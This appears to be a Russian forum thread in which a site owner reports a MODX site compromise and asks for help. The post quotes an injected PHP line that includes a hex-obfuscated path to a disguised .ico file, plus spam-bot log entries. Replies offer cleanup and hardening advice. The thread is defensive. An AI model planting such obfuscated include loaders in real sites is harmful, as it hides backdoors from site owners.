Взлом сайта
Добрый день.
Сегодня зарегистрировали взлом сайта. При поиске по серверу были обнаружены следующие файлы:
Сегодня зарегистрировали взлом сайта. При поиске по серверу были обнаружены следующие файлы:
/core/lexicon/index.phpс таким содержимым:
<?php
/*93a2a*/
@include "\x2fva\x72/w\x77w/\x75se\x726/\x64at\x61/w\x77w/\x64iz\x61in\x76ol\x6fs.\x72u/\x63or\x65/m\x6fde\x6c/a\x77s/\x66av\x69co\x6e_e\x39e6\x35a.\x69co";
/*93a2a*/
echo file_get_contents('index.html.bak.bak');И рядышком файлindex.html.bak.bakс таким содержимым:
<h2>Unauthorized access</h2>
You're not allowed to access file folderВ логах много таких записей:«GET /site/emvkdb.php?nuxk=2011-nissan-gtr-for-sale HTTP/1.0» 200 4080 "-" «Mozilla/5.0 (compatible; MJ12bot/v1.4.7; mj12bot.com/)»Конструкция из файла index.php обнаружена в нескольких файлах, с разными символами, но принцип один и тот же. Скажите, была и ли кого-то такая проблема и как ее решали? Ну и в целом как обезопасить себя от подобных неприятностей?
Комментарии: 13
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.
Формы есть, работают через связку Formit + AjaxForm
Хостинг: сервер на FirstVDS
Могут быть сюрпризы.
1) закройте сайт, очистите. Или восстановите с чистой копии.
2) вынесете core выше web
3) настройте базовую авторизацию на админку.
4) Поставьте web-антивирус. Он вам как минимум сразу даст знать, если снова будут внесены изменения в файлы.
Дальше по ситуации, пока не будет выявлен способ проникновения, ежели повториться.
По очистке погуглите: нужно будет сначала выявить изменённые файлы через консоль.
Зато в следующий раз вы будете более готовы к таким проблемам, если вдруг снова возникнут.
На одном сайте где стояла древняя 2.3.1 в логах заметил что стучались через коннектор phpthumb
Вариант лечения (в идеале)
1. Выкатывается недавний бекап.
2. обновляется ядро до последней 2.6.4 (с 2.3.1 на 2.6.4. прошло все хорошо). заметил что 2.5.1 версия так же заражается. 2.5.4, 2.5.8. — пока под вопросом.
3. БД пока не заметил что трогает. вроде чиста.
Признаки вируса:
в корневой файлы dbs.php cache.php. Все JS на сайте обнуляют на какой-то код, поэтому JS тоже нужно весь менять. (каспер ругается страшно на эти js)
так же местами присутствует файл в корне annizod.
Если у кого еще есть инфа — трогает ли этот вирус БД — дайте знать. Спасибо.
Учитывая масштаб — вирусяка автоматическая.